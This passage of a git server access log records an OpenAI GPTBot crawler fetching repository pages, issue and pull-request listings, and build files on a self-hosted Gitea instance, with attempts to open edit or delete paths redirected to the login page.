like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42454] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:28:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py" -[17/Feb/2026:17:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/ui_main.py" -[17/Feb/2026:17:28:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py" -[17/Feb/2026:17:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/ui_main.py" -[17/Feb/2026:17:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43101] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 34800] [Gzip 14.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py" -[17/Feb/2026:17:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 9781] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py" -[17/Feb/2026:17:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 21023] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py" -[17/Feb/2026:17:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 850] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py" -[17/Feb/2026:17:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 13354] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:17:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:17:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11015] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md" -[17/Feb/2026:17:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md" -[17/Feb/2026:17:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11016] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md" -[17/Feb/2026:17:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:28:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/ui_main.py" -[17/Feb/2026:17:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/ui_main.py" -[17/Feb/2026:17:28:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/ui_main.py" -[17/Feb/2026:17:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/ui_main.py" -[17/Feb/2026:17:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:28:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat" -[17/Feb/2026:17:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build_exe.bat" -[17/Feb/2026:17:28:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat" -[17/Feb/2026:17:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build_exe.bat" -[17/Feb/2026:17:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:17:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:17:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 9844] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat" -[17/Feb/2026:17:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 13314] [Gzip 6.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat" -[17/Feb/2026:17:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 989] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat" -[17/Feb/2026:17:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md" -[17/Feb/2026:17:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11016] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md" -[17/Feb/2026:17:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md" -[17/Feb/2026:17:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:17:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:17:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:17:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:17:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:17:28:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build_exe.bat" -[17/Feb/2026:17:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/build_exe.bat" -[17/Feb/2026:17:28:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build_exe.bat" -[17/Feb/2026:17:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build_exe.bat" -[17/Feb/2026:17:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:17:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md?display=source" [Client 74.7.227.38] [Length 13628] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" -[17/Feb/2026:17:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12?follow_symlink=1" [Client 74.7.227.38] [Length 11085] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" -[17/Feb/2026:17:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 12245] [Gzip 5.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py" -[17/Feb/2026:17:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.55] [Sent-to 192.168.0.250] 